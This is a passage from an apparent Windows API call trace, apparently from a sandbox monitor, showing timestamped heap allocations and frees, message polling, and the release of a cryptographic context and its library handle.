(HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0126.942] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0126.942] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0126.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0126.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0126.943] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0126.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0126.943] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0126.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0126.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0126.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0126.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0126.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0126.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0126.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0126.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0126.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0126.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0126.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0126.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0126.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0126.944] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0126.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0126.944] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0126.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0126.945] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0126.945] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0126.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0126.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0126.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0126.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0126.947] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0126.947] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0126.947] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0126.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0126.947] FreeLibrary (hLibModule=0x756e0000) returned 1 [0126.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0126.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0126.948] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0126.948] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0126.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0126.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0126.948] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0126.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0126.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0126.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0126.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.949] CloseHandle (hObject=0x2a0) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb450 | out: hHeap=0x1780000) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0126.950] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0126.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0126.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0126.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0126.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0126.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0126.951] CloseHandle (hObject=0x258) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0126.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0126.953] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0126.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0126.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0126.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0126.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0126.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0126.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0126.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0126.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0126.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0126.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 